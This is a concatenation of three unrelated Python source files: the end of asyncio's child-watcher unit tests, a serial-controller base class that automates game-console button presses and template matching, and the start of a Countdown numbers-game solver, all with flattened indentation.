self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child 1 terminates (code 78)
# child 2 terminates (signal 5)
self.add_zombie(45, 78)
self.add_zombie(46, -5)
self.running = False
self.watcher._sig_chld()
callback1.assert_called_once_with(45, 78, 17, 8)
callback2.assert_called_once_with(46, -5, 1147, 18)
self.assertTrue(m.WIFSIGNALED.called)
self.assertTrue(m.WIFEXITED.called)
self.assertTrue(m.WEXITSTATUS.called)
self.assertTrue(m.WTERMSIG.called)
m.WIFSIGNALED.reset_mock()
m.WIFEXITED.reset_mock()
m.WTERMSIG.reset_mock()
m.WEXITSTATUS.reset_mock()
callback1.reset_mock()
callback2.reset_mock()
# ensure that the children are effectively reaped
self.add_zombie(45, 14)
self.add_zombie(46, 15)
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WTERMSIG.called)
@waitpid_mocks
def test_sigchld_race_condition(self, m):
# register a child
callback = mock.Mock()
with self.watcher:
# child terminates before being registered
self.add_zombie(50, 4)
self.watcher._sig_chld()
self.watcher.add_child_handler(50, callback, 1, 12)
callback.assert_called_once_with(50, 4, 1, 12)
callback.reset_mock()
# ensure that the child is effectively reaped
self.add_zombie(50, -1)
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback.called)
@waitpid_mocks
def test_sigchld_replace_handler(self, m):
callback1 = mock.Mock()
callback2 = mock.Mock()
# register a child
with self.watcher:
self.running = True
self.watcher.add_child_handler(51, callback1, 19)
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# register the same child again
with self.watcher:
self.watcher.add_child_handler(51, callback2, 21)
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child terminates (signal 8)
self.running = False
self.add_zombie(51, -8)
self.watcher._sig_chld()
callback2.assert_called_once_with(51, -8, 21)
self.assertFalse(callback1.called)
self.assertTrue(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertTrue(m.WTERMSIG.called)
m.WIFSIGNALED.reset_mock()
m.WIFEXITED.reset_mock()
m.WTERMSIG.reset_mock()
callback2.reset_mock()
# ensure that the child is effectively reaped
self.add_zombie(51, 13)
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WTERMSIG.called)
@waitpid_mocks
def test_sigchld_remove_handler(self, m):
callback = mock.Mock()
# register a child
with self.watcher:
self.running = True
self.watcher.add_child_handler(52, callback, 1984)
self.assertFalse(callback.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# unregister the child
self.watcher.remove_child_handler(52)
self.assertFalse(callback.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child terminates (code 99)
self.running = False
self.add_zombie(52, 99)
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback.called)
@waitpid_mocks
def test_sigchld_unknown_status(self, m):
callback = mock.Mock()
# register a child
with self.watcher:
self.running = True
self.watcher.add_child_handler(53, callback, -19)
self.assertFalse(callback.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# terminate with unknown status
self.zombies[53] = 1178
self.running = False
self.watcher._sig_chld()
callback.assert_called_once_with(53, 1178, -19)
self.assertTrue(m.WIFEXITED.called)
self.assertTrue(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
callback.reset_mock()
m.WIFEXITED.reset_mock()
m.WIFSIGNALED.reset_mock()
# ensure that the child is effectively reaped
self.add_zombie(53, 101)
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback.called)
@waitpid_mocks
def test_remove_child_handler(self, m):
callback1 = mock.Mock()
callback2 = mock.Mock()
callback3 = mock.Mock()
# register children
with self.watcher:
self.running = True
self.watcher.add_child_handler(54, callback1, 1)
self.watcher.add_child_handler(55, callback2, 2)
self.watcher.add_child_handler(56, callback3, 3)
# remove child handler 1
self.assertTrue(self.watcher.remove_child_handler(54))
# remove child handler 2 multiple times
self.assertTrue(self.watcher.remove_child_handler(55))
self.assertFalse(self.watcher.remove_child_handler(55))
self.assertFalse(self.watcher.remove_child_handler(55))
# all children terminate
self.add_zombie(54, 0)
self.add_zombie(55, 1)
self.add_zombie(56, 2)
self.running = False
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
callback3.assert_called_once_with(56, 2, 3)
@waitpid_mocks
def test_sigchld_unhandled_exception(self, m):
callback = mock.Mock()
# register a child
with self.watcher:
self.running = True
self.watcher.add_child_handler(57, callback)
# raise an exception
m.waitpid.side_effect = ValueError
with mock.patch.object(log.logger,
'error') as m_error:
self.assertEqual(self.watcher._sig_chld(), None)
self.assertTrue(m_error.called)
@waitpid_mocks
def test_sigchld_child_reaped_elsewhere(self, m):
# register a child
callback = mock.Mock()
with self.watcher:
self.running = True
self.watcher.add_child_handler(58, callback)
self.assertFalse(callback.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child terminates
self.running = False
self.add_zombie(58, 4)
# waitpid is called elsewhere
os.waitpid(58, os.WNOHANG)
m.waitpid.reset_mock()
# sigchld
with self.ignore_warnings:
self.watcher._sig_chld()
if isinstance(self.watcher, asyncio.FastChildWatcher):
            # here the FastChildWatcher enters a deadlock
# (there is no way to prevent it)
self.assertFalse(callback.called)
else:
callback.assert_called_once_with(58, 255)
@waitpid_mocks
def test_sigchld_unknown_pid_during_registration(self, m):
# register two children
callback1 = mock.Mock()
callback2 = mock.Mock()
with self.ignore_warnings, self.watcher:
self.running = True
# child 1 terminates
self.add_zombie(591, 7)
# an unknown child terminates
self.add_zombie(593, 17)
self.watcher._sig_chld()
self.watcher.add_child_handler(591, callback1)
self.watcher.add_child_handler(592, callback2)
callback1.assert_called_once_with(591, 7)
self.assertFalse(callback2.called)
@waitpid_mocks
def test_set_loop(self, m):
# register a child
callback = mock.Mock()
with self.watcher:
self.running = True
self.watcher.add_child_handler(60, callback)
# attach a new loop
old_loop = self.loop
self.loop = self.new_test_loop()
patch = mock.patch.object
with patch(old_loop, "remove_signal_handler") as m_old_remove, \
patch(self.loop, "add_signal_handler") as m_new_add:
self.watcher.attach_loop(self.loop)
m_old_remove.assert_called_once_with(
signal.SIGCHLD)
m_new_add.assert_called_once_with(
signal.SIGCHLD, self.watcher._sig_chld)
# child terminates
self.running = False
self.add_zombie(60, 9)
self.watcher._sig_chld()
callback.assert_called_once_with(60, 9)
@waitpid_mocks
def test_set_loop_race_condition(self, m):
# register 3 children
callback1 = mock.Mock()
callback2 = mock.Mock()
callback3 = mock.Mock()
with self.watcher:
self.running = True
self.watcher.add_child_handler(61, callback1)
self.watcher.add_child_handler(62, callback2)
self.watcher.add_child_handler(622, callback3)
# detach the loop
old_loop = self.loop
self.loop = None
with mock.patch.object(
old_loop, "remove_signal_handler") as m_remove_signal_handler:
with self.assertWarnsRegex(
RuntimeWarning, 'A loop is being detached'):
self.watcher.attach_loop(None)
m_remove_signal_handler.assert_called_once_with(
signal.SIGCHLD)
# child 1 & 2 terminate
self.add_zombie(61, 11)
self.add_zombie(62, -5)
# SIGCHLD was not caught
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(callback3.called)
# attach a new loop
self.loop = self.new_test_loop()
with mock.patch.object(
self.loop, "add_signal_handler") as m_add_signal_handler:
self.watcher.attach_loop(self.loop)
m_add_signal_handler.assert_called_once_with(
signal.SIGCHLD, self.watcher._sig_chld)
callback1.assert_called_once_with(61, 11) # race condition!
callback2.assert_called_once_with(62, -5) # race condition!
self.assertFalse(callback3.called)
callback1.reset_mock()
callback2.reset_mock()
# child 3 terminates
self.running = False
self.add_zombie(622, 19)
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
callback3.assert_called_once_with(622, 19)
@waitpid_mocks
def test_close(self, m):
# register two children
callback1 = mock.Mock()
with self.watcher:
self.running = True
# child 1 terminates
self.add_zombie(63, 9)
# other child terminates
self.add_zombie(65, 18)
self.watcher._sig_chld()
self.watcher.add_child_handler(63, callback1)
self.watcher.add_child_handler(64, callback1)
self.assertEqual(len(self.watcher._callbacks), 1)
if isinstance(self.watcher, asyncio.FastChildWatcher):
self.assertEqual(len(self.watcher._zombies), 1)
with mock.patch.object(
self.loop,
"remove_signal_handler") as m_remove_signal_handler:
self.watcher.close()
m_remove_signal_handler.assert_called_once_with(
signal.SIGCHLD)
self.assertFalse(self.watcher._callbacks)
if isinstance(self.watcher, asyncio.FastChildWatcher):
self.assertFalse(self.watcher._zombies)
@waitpid_mocks
def test_add_child_handler_with_no_loop_attached(self, m):
callback = mock.Mock()
with self.create_watcher() as watcher:
with self.assertRaisesRegex(
RuntimeError,
'the child watcher does not have a loop attached'):
watcher.add_child_handler(100, callback)
class SafeChildWatcherTests(ChildWatcherTestsMixin, test_utils.TestCase):
def create_watcher(self):
return asyncio.SafeChildWatcher()
class FastChildWatcherTests(ChildWatcherTestsMixin, test_utils.TestCase):
def create_watcher(self):
return asyncio.FastChildWatcher()
class PolicyTests(unittest.TestCase):
def create_policy(self):
return asyncio.DefaultEventLoopPolicy()
def test_get_child_watcher(self):
policy = self.create_policy()
self.assertIsNone(policy._watcher)
watcher = policy.get_child_watcher()
self.assertIsInstance(watcher, asyncio.SafeChildWatcher)
self.assertIs(policy._watcher, watcher)
self.assertIs(watcher, policy.get_child_watcher())
self.assertIsNone(watcher._loop)
def test_get_child_watcher_after_set(self):
policy = self.create_policy()
watcher = asyncio.FastChildWatcher()
policy.set_child_watcher(watcher)
self.assertIs(policy._watcher, watcher)
self.assertIs(watcher, policy.get_child_watcher())
def test_get_child_watcher_with_mainloop_existing(self):
policy = self.create_policy()
loop = policy.get_event_loop()
self.assertIsNone(policy._watcher)
watcher = policy.get_child_watcher()
self.assertIsInstance(watcher, asyncio.SafeChildWatcher)
self.assertIs(watcher._loop, loop)
loop.close()
def test_get_child_watcher_thread(self):
def f():
policy.set_event_loop(policy.new_event_loop())
self.assertIsInstance(policy.get_event_loop(),
asyncio.AbstractEventLoop)
watcher = policy.get_child_watcher()
self.assertIsInstance(watcher, asyncio.SafeChildWatcher)
self.assertIsNone(watcher._loop)
policy.get_event_loop().close()
policy = self.create_policy()
th = threading.Thread(target=f)
th.start()
th.join()
def test_child_watcher_replace_mainloop_existing(self):
policy = self.create_policy()
loop = policy.get_event_loop()
watcher = policy.get_child_watcher()
self.assertIs(watcher._loop, loop)
new_loop = policy.new_event_loop()
policy.set_event_loop(new_loop)
self.assertIs(watcher._loop, new_loop)
policy.set_event_loop(None)
self.assertIs(watcher._loop, None)
loop.close()
new_loop.close()
class TestFunctional(unittest.TestCase):
def setUp(self):
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
def tearDown(self):
self.loop.close()
asyncio.set_event_loop(None)
def test_add_reader_invalid_argument(self):
def assert_raises():
return self.assertRaisesRegex(ValueError, r'Invalid file object')
cb = lambda: None
with assert_raises():
self.loop.add_reader(object(), cb)
with assert_raises():
self.loop.add_writer(object(), cb)
with assert_raises():
self.loop.remove_reader(object())
with assert_raises():
self.loop.remove_writer(object())
def test_add_reader_or_writer_transport_fd(self):
def assert_raises():
return self.assertRaisesRegex(
RuntimeError,
r'File descriptor .* is used by transport')
async def runner():
tr, pr = await self.loop.create_connection(
lambda: asyncio.Protocol(), sock=rsock)
try:
cb = lambda: None
with assert_raises():
self.loop.add_reader(rsock, cb)
with assert_raises():
self.loop.add_reader(rsock.fileno(), cb)
with assert_raises():
self.loop.remove_reader(rsock)
with assert_raises():
self.loop.remove_reader(rsock.fileno())
with assert_raises():
self.loop.add_writer(rsock, cb)
with assert_raises():
self.loop.add_writer(rsock.fileno(), cb)
with assert_raises():
self.loop.remove_writer(rsock)
with assert_raises():
self.loop.remove_writer(rsock.fileno())
finally:
tr.close()
rsock, wsock = socket.socketpair()
try:
self.loop.run_until_complete(runner())
finally:
rsock.close()
wsock.close()
if __name__ == '__main__':
unittest.main()
|
PythonCommandBase.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from abc import ABCMeta, abstractmethod
from time import sleep
import threading
import cv2
from .Keys import KeyPress, Button, Hat, Direction, Stick
from . import CommandBase
# Exception class used to signal that a stop request was sent from the main window
class StopThread(Exception):
pass
# Python command
class PythonCommand(CommandBase.Command):
def __init__(self):
super(PythonCommand, self).__init__()
self.keys = None
self.thread = None
self.alive = True
self.postProcess = None
    @abstractmethod
def do(self):
pass
def do_safe(self, ser):
if self.keys is None:
self.keys = KeyPress(ser)
try:
if self.alive:
self.do()
self.finish()
except StopThread:
print('-- finished successfully. --')
except:
if self.keys is None:
self.keys = KeyPress(ser)
            print('interrupt')
import traceback
traceback.print_exc()
self.keys.end()
self.alive = False
def start(self, ser, postProcess=None):
self.alive = True
self.postProcess = postProcess
if not self.thread:
self.thread = threading.Thread(target=self.do_safe, args=(ser,))
self.thread.start()
def end(self, ser):
self.sendStopRequest()
def sendStopRequest(self):
        if self.checkIfAlive():  # check whether the worker is still running before requesting a stop
self.alive = False
print('-- sent a stop request. --')
# NOTE: Use this function if you want to get out from a command loop by yourself
def finish(self):
self.alive = False
self.end(self.keys.ser)
    # Press button(s) for `duration` seconds, then wait `wait` seconds
def press(self, buttons, duration=0.1, wait=0.1):
self.keys.input(buttons)
self.wait(duration)
self.keys.inputEnd(buttons)
self.wait(wait)
self.checkIfAlive()
    # Press button(s) `repeat` times, each for `duration` seconds, with `interval` seconds between presses
def pressRep(self, buttons, repeat, duration=0.1, interval=0.1, wait=0.1):
for i in range(0, repeat):
self.press(buttons, duration, 0 if i == repeat - 1 else interval)
self.wait(wait)
    # Start holding button(s) down
def hold(self, buttons, wait=0.1):
self.keys.hold(buttons)
self.wait(wait)
    # Release held button(s)
def holdEnd(self, buttons):
self.keys.holdEnd(buttons)
self.checkIfAlive()
    # Do nothing for `wait` seconds
def wait(self, wait):
sleep(wait)
self.checkIfAlive()
def checkIfAlive(self):
if not self.alive:
self.keys.end()
self.keys = None
self.thread = None
            if self.postProcess is not None:
self.postProcess()
self.postProcess = None
            # Raise an exception to exit the working thread
raise StopThread('exit successfully')
else:
return True
    # Use the time glitch:
    # changes the system date to collect the every-other-day bonus without any penalty
def timeLeap(self, is_go_back=True):
self.press(Button.HOME, wait=1)
self.press(Direction.DOWN)
self.press(Direction.RIGHT)
self.press(Direction.RIGHT)
self.press(Direction.RIGHT)
self.press(Direction.RIGHT)
self.press(Button.A, wait=1.5) # System Settings
self.press(Direction.DOWN, duration=2, wait=0.5)
self.press(Button.A, wait=0.3) # System Settings > System
self.press(Direction.DOWN)
self.press(Direction.DOWN)
self.press(Direction.DOWN)
self.press(Direction.DOWN, wait=0.3)
self.press(Button.A, wait=0.2) # Date and Time
self.press(Direction.DOWN, duration=0.7, wait=0.2)
# increment and decrement
if is_go_back:
self.press(Button.A, wait=0.2)
self.press(Direction.UP, wait=0.2) # Increment a year
self.press(Direction.RIGHT, duration=1.5)
self.press(Button.A, wait=0.5)
self.press(Button.A, wait=0.2)
self.press(Direction.LEFT, duration=1.5)
self.press(Direction.DOWN, wait=0.2) # Decrement a year
self.press(Direction.RIGHT, duration=1.5)
self.press(Button.A, wait=0.5)
# use only increment
# for use of faster time leap
else:
self.press(Button.A, wait=0.2)
self.press(Direction.RIGHT)
self.press(Direction.RIGHT)
self.press(Direction.UP, wait=0.2) # increment a day
self.press(Direction.RIGHT, duration=1)
self.press(Button.A, wait=0.5)
self.press(Button.HOME, wait=1)
self.press(Button.HOME, wait=1)
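# A minimal usage sketch (illustrative; the class name MashA is made up, but
# PythonCommand, Button.A, press() and the StopThread-based stop mechanism are
# all defined above). checkIfAlive(), called inside press(), raises StopThread
# once a stop request arrives, which ends the loop cleanly:
#
#     class MashA(PythonCommand):
#         def do(self):
#             while True:
#                 self.press(Button.A, duration=0.05, wait=0.05)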
TEMPLATE_PATH = "./Template/"
class ImageProcPythonCommand(PythonCommand):
def __init__(self, cam):
super(ImageProcPythonCommand, self).__init__()
self.camera = cam
    # Judge whether the current screenshot contains the given template image, using template matching.
    # Unless the template's color matters, it is recommended to keep use_gray=True and match grayscale
    # images for better performance.
def isContainTemplate(self,
template_path, threshold=0.7, use_gray=True, show_value=False,
area=[], tmp_area=[]):
# Read a current image
src = self.camera.readFrame()
src = cv2.cvtColor(src, cv2.COLOR_BGR2GRAY) if use_gray else src
if area:
src = src[area[2]:area[3], area[0]:area[1]]
# Read a template image
template = cv2.imread(TEMPLATE_PATH+template_path, cv2.IMREAD_GRAYSCALE if use_gray else cv2.IMREAD_COLOR)
if tmp_area:
template = template[tmp_area[2]:tmp_area[3], tmp_area[0]:tmp_area[1]] # trim
w, h = template.shape[1], template.shape[0]
method = cv2.TM_CCOEFF_NORMED
res = cv2.matchTemplate(src, template, method)
_, max_val, _, max_loc = cv2.minMaxLoc(res)
if show_value:
print(template_path + ' ZNCC value: ' + str(max_val))
if max_val > threshold:
if use_gray:
src = cv2.cvtColor(src, cv2.COLOR_GRAY2BGR)
top_left = max_loc
bottom_right = (top_left[0] + w, top_left[1] + h)
cv2.rectangle(src, top_left, bottom_right, (255, 0, 255), 2)
return True
else:
return False
    # Get a binarized image of the inter-frame difference
def getInterframeDiff(self, frame1, frame2, frame3, threshold):
diff1 = cv2.absdiff(frame1, frame2)
diff2 = cv2.absdiff(frame2, frame3)
diff = cv2.bitwise_and(diff1, diff2)
# binarize
img_th = cv2.threshold(diff, threshold, 255, cv2.THRESH_BINARY)[1]
# remove noise
mask = cv2.medianBlur(img_th, 3)
return mask
    # Take a screenshot (saved in /SerialController/Captures/)
def saveCapture(self, filename):
self.camera.saveCapture(filename)
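# Usage sketch for template matching (illustrative; 'example.png' is a
# hypothetical file under ./Template/, while isContainTemplate(), wait() and
# press() are defined above):
#
#     class WaitForScreen(ImageProcPythonCommand):
#         def do(self):
#             while not self.isContainTemplate('example.png', threshold=0.8):
#                 self.wait(0.5)
#             self.press(Button.A)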
|
countdown.py
|
#!/usr/bin/env python
"""
http://en.wikipedia.org/wiki/Countdown_%28game_show%29#Numbers_round
Given 6 integers, and a target integer, combine the 6 integers using
only the 4 basic arithmetic operations (+,-,*,/) to come as close as
possible to the target.
You don't have to use all 6 integers. A number can be used as many
times as it appears.
In the game show, the target number is a random three digit number.
The 6 integers are drawn from two sets. The set of large integers has
four numbers: (25, 50, 75, 100) (in some episodes this was changed to
(12, 37, 62, 87)). The set of small integers has 20 numbers: the
numbers 1..10 twice. The contestant could say how many of each set he
would like (e.g. 4 large and 2 small, which of course would give him
all the large numbers)
The game show further stipulates that every step of the calculation
must result in positive integers.
I'm not sure if the game show also requires that you apply each
operation one step at a time (i.e., a "left-most" parenthesization)
One example: using 3, 6, 25, 50, 75, 100 to get to 952:
((100 + 6) * 3 * 75 - 50) / 25 = 106 * 9 - 2 = 952
Other examples:
Use 1, 3, 7, 10, 25, 50 to get 765
http://www.4nums.com/game/difficulties/
Compare to haskell version:
http://www.cs.nott.ac.uk/~gmh/countdown2.hs
"""
# --------------------------------------------------------------------------- #
from __future__ import absolute_import, division, with_statement
import logging
import optparse
import operator
import sys
from threading import Thread
try:
from Queue import Queue, Empty
except ImportError:
from queue import Queue, Empty # python 3.x
logging.basicConfig(format='[%(asctime)s '
'%(funcName)s:%(lineno)s %(levelname)-5s] '
'%(message)s')
# --------------------------------------------------------------------------- #
DEFAULT_NUM_VALS = 6
DEFAULT_MIN_TARGET = 100
DEFAULT_MAX_TARGET = 999
DEFAULT_NUM_LARGE = 4
DEFAULT_LARGE_NUMBERS = '25,50,75,100'
# --------------------------------------------------------------------------- #
def main():
(opts, args) = getopts()
(vals, target) = generate(
opts.num_vals,
target=opts.target,
given=args,
min_target=opts.min_target,
max_target=opts.max_target,
num_large=opts.num_large,
large_numbers=opts.large_numbers,
replacement=opts.replacement)
print "Target: {0}, Vals: {1}".format(target, vals)
results = countdown(
vals, target,
all_orders=(not opts.in_order),
all_subsets=(not opts.use_all),
use_pow=opts.use_pow)
if opts.single_threaded:
results = tuple(results)
num_results = len(results)
if results and results[0].value != target:
num_results = 0
raw_input("Press Enter to See Solutions ({0} results found): ".format(
num_results))
else:
(_, queue) = run_in_thread(results)
results = iter_queue_values(queue)
raw_input("Press Enter to See Solutions: ")
for expr in results:
print "{0} = {1}".format(expr, expr.value)
def getopts():
parser = optparse.OptionParser()
parser.add_option('--verbose', action='store_true')
parser.add_option('--log_level')
parser.add_option('--generate', action='store_true')
parser.add_option('--replacement', action='store_true',
help='When generating small values, sample with '
'replacement')
parser.add_option('--num_vals', type=int)
parser.add_option('--target', '-t', type=int)
parser.add_option('--min_target', type=int, default=DEFAULT_MIN_TARGET)
parser.add_option('--max_target', type=int, default=DEFAULT_MAX_TARGET)
parser.add_option('--num_large', type=int, default=DEFAULT_NUM_LARGE)
parser.add_option('--use_pow', action='store_true',
help='Allow exponentiation')
parser.add_option('--large_numbers', default=DEFAULT_LARGE_NUMBERS)
parser.add_option('--in_order', action='store_true',
help="The numbers must be used in order "
"in the expression")
parser.add_option('--use_all', action='store_true',
help="All the given numbers must be used "
"in the expression")
parser.add_option('--integer', action='store_true',
help='Requires that every intermediate step '
'in the calculation produces an integer')
parser.add_option('--positive', action='store_true',
help='Requires that every intermediate step in '
'the calculation produces a positive number')
parser.add_option('--prune', action='store_true',
help='prunes out some solutions '
'if shorter solutions exist')
parser.add_option('--twentyfour', action='store_true',
help='run the standard 24 game')
parser.add_option('--single_threaded', action='store_true',
help='run in a single thread')
(opts, args) = parser.parse_args()
if opts.verbose:
logging.getLogger().setLevel(logging.DEBUG)
if opts.log_level is not None:
level = getattr(logging, opts.log_level.upper())
logging.getLogger().setLevel(level)
logging.info("Setting log level to %s", level)
if opts.num_vals is None:
opts.num_vals = len(args)
if opts.num_vals == 0:
opts.num_vals = DEFAULT_NUM_VALS
opts.large_numbers = opts.large_numbers.split(',')
if opts.integer:
Operators.DIV = Operators.IDIV
if opts.positive:
Expression.POSITIVE_ONLY = True
# This reduces the number of expressions we try, so we don't try
# both a + b and b + a
Operators.ADD = Operators.ASADD
Operators.MUL = Operators.ASMUL
if opts.prune:
# This avoids any solution where we multiply or divide by an
# expression that is 1
Operators.MUL = Operators.SMUL
Operators.ADD = Operators.SADD
if opts.integer:
Operators.DIV = Operators.SIDIV
if opts.twentyfour:
opts.target = 24
opts.num_vals = 4
opts.num_large = 0
opts.replacement = True
opts.use_all = True
opts.single_threaded = True
return (opts, args)
# --------------------------------------------------------------------------- #
def iter_queue_values(queue):
while True:
try:
yield queue.get(block=False)
except Empty:
break
def run_in_thread(gen):
"""
Mostly stolen from
http://stackoverflow.com/questions/375427/non-blocking-read-on-a-subprocess-pipe-in-python
"""
def enqueue_output(gen, queue):
for line in gen:
queue.put(line)
queue = Queue()
t = Thread(target=enqueue_output, args=(gen, queue))
t.daemon = True
t.start()
return (t, queue)
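# Usage sketch (mirrors main() above): run a generator in a daemon thread and
# later drain whatever it has produced so far without blocking:
#
#   (_, q) = run_in_thread(countdown(vals, target))
#   ...                      # let the search run while we do something else
#   for expr in iter_queue_values(q):
#       print expr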
def sample_without_replacement(n, vals):
if n > len(vals):
raise ValueError("Can't choose {0} values from {1}".format(n, vals))
import random
copy = list(vals)
retvals = []
for _ in xrange(n):
idx = random.randrange(0, len(copy))
retvals.append(copy[idx])
copy = copy[:idx] + copy[idx+1:]
return retvals
def generate(num_vals=DEFAULT_NUM_VALS,
target=None,
given=None,
min_target=DEFAULT_MIN_TARGET,
max_target=DEFAULT_MAX_TARGET,
num_large=DEFAULT_NUM_LARGE,
large_numbers=None,
replacement=False):
import random
# choose the target
if target is None:
target = random.randint(min_target, max_target)
# choose the values
if given is None:
given = []
given = [int(g) for g in given]
if len(given) > num_vals:
vals = given[:num_vals]
else:
vals = given
if large_numbers is None:
large_numbers = DEFAULT_LARGE_NUMBERS.split(',')
large_numbers = [int(l) for l in large_numbers]
vals.extend(
sample_without_replacement(
min(num_vals - len(vals), num_large), large_numbers))
if num_vals > len(vals):
num_left = num_vals - len(vals)
if replacement:
for _ in xrange(num_left):
vals.append(random.randint(1, 10))
else:
vals.extend(sample_without_replacement(
num_left, range(1, 11) * 2))
return vals, target
# --------------------------------------------------------------------------- #
class ExpressionError(Exception):
pass
class Expression(object):
POSITIVE_ONLY = False
def __init__(self, value):
self._value = value
@property
def value(self):
if self._value is None:
value = try_round(self.compute_value())
if self.POSITIVE_ONLY and value < 0:
raise ExpressionError("Negative value")
self._value = value
return self._value
def compute_value(self):
raise NotImplementedError
def __str__(self):
return str(self.value)
@property
def exception(self):
try:
self.value
return False
except ZeroDivisionError:
return True
except ExpressionError:
return True
except ValueError:
return True
@property
def integer(self):
return int(self.value) == self.value
@property
def negative(self):
return self.value < 0
class Value(Expression):
def __init__(self, value):
super(Value, self).__init__(value)
def __repr__(self):
return "Value({0})".format(self.value)
def __eq__(self, other):
return type(self) == type(other) and self.value == other.value
def __hash__(self):
return hash(self.value)
class BiExpr(Expression):
USE_CACHE = False
CACHE = {}
def __init__(self, operator, left, right):
super(BiExpr, self).__init__(None)
self.operator = operator
self.left = left
self.right = right
def compute_value(self):
try:
return self.operator(self.left.value, self.right.value)
except OverflowError as e:
(tp, value, traceback) = sys.exc_info()
value = 'While evaluating expression {0}: {1}'.format(self, value)
raise tp, value, traceback
def __str__(self):
return '({0} {1} {2})'.format(self.left, self.operator, self.right)
def __eq__(self, other):
return ((self.operator, self.left, self.right) ==
(other.operator, other.left, other.right))
def __hash__(self):
return hash((self.operator, self.left, self.right))
@classmethod
def get_expr(cls, operator, left, right):
if cls.USE_CACHE:
key = (operator, left, right)
if key not in cls.CACHE:
cls.CACHE[key] = BiExpr(operator, left, right)
return cls.CACHE[key]
else:
return BiExpr(operator, left, right)
class Operator(object):
def __init__(self, func, string, commutative=False):
self.func = func
self.string = string
self.commutative = commutative
def __call__(self, *args, **kwargs):
return self.func(*args, **kwargs)
def __str__(self):
return self.string
def __eq__(self, other):
return self.string == other.string
def __hash__(self):
return hash(self.string)
def fpeq(a, b, epsilon=1e-6):
"""
Floating point equality
"""
return abs(a - b) < epsilon
def safediv(a, b):
try:
return operator.truediv(a, b)
except OverflowError as e:
try:
return intdiv(a, b)
except ExpressionError:
raise(e)
def intdiv(a, b):
if a % b != 0:
raise ExpressionError("{0} is not a multiple of {1}".format(a, b))
return operator.div(a, b)
def strictdiv(a, b):
if a % b != 0 or b == 1:
raise ExpressionError("{0} is not a multiple of {1}".format(a, b))
return operator.div(a, b)
def asymadd(a, b):
if a < b:
raise ExpressionError("Optimization: only add bigger to smaller")
return a + b
def asymmul(a, b):
if a < b:
raise ExpressionError("Optimization: only multiply bigger to smaller")
return a * b
def strictmul(a, b):
if a < b or a == 1 or b == 1:
raise ExpressionError("Optimization: only multiply bigger to smaller")
return a * b
def strictadd(a, b):
if a < b or a == 0 or b == 0:
raise ExpressionError("Optimization: only add bigger to smaller")
return a + b
def try_round(v):
try:
return int(round(v)) if fpeq(v, round(v)) else v
except OverflowError:
return v
class Operators(object):
ADD = Operator(operator.add, '+', commutative=True)
SUB = Operator(operator.sub, '-')
MUL = Operator(operator.mul, '*', commutative=True)
DIV = Operator(safediv, '/')
POW = Operator(operator.pow, '^')
# Throws an error if the value isn't an integer
IDIV = Operator(intdiv, '/')
# Throws an error if the second number is bigger
ASADD = Operator(asymadd, '+')
ASMUL = Operator(asymmul, '*')
# Throws an error if one of the arguments is the identity
SADD = Operator(strictadd, '+')
SMUL = Operator(strictmul, '*')
SIDIV = Operator(strictdiv, '/')
@classmethod
def all(cls, use_pow=False):
if use_pow:
return (cls.ADD, cls.SUB, cls.MUL, cls.DIV, cls.POW)
else:
return (cls.ADD, cls.SUB, cls.MUL, cls.DIV)
def get_subsets(lst, max_size=None, avoid_dups=False):
"""
>>> [s for s in get_subsets(())]
[()]
>>> [s for s in get_subsets((1,))]
[(), (1,)]
>>> [s for s in get_subsets((1, 2))]
[(), (1,), (2,), (1, 2)]
>>> [s for s in get_subsets((1, 2, 3))]
[(), (1,), (2,), (1, 2), (3,), (1, 3), (2, 3), (1, 2, 3)]
>>> [s for s in get_subsets((1, 2, 3), max_size=2)]
[(), (1,), (2,), (1, 2), (3,), (1, 3), (2, 3)]
>>> [s for s in get_subsets((1, 1), avoid_dups=True)]
[(), (1,), (1, 1)]
>>> [s for s in get_subsets((1, 1, 2), avoid_dups=True)]
[(), (1,), (1, 1), (2,), (1, 2), (1, 1, 2)]
>>> [s for s in get_subsets((1, 1, 2, 2), avoid_dups=True)]
[(), (1,), (1, 1), (2,), (1, 2), (1, 1, 2), (2, 2), (1, 2, 2), (1, 1, 2, 2)]
"""
if len(lst) <= 0:
yield lst
return
seen = set()
for subset in get_subsets(lst[1:], max_size=max_size,
avoid_dups=avoid_dups):
if avoid_dups:
sset = tuple(sorted(subset))
if not avoid_dups or sset not in seen:
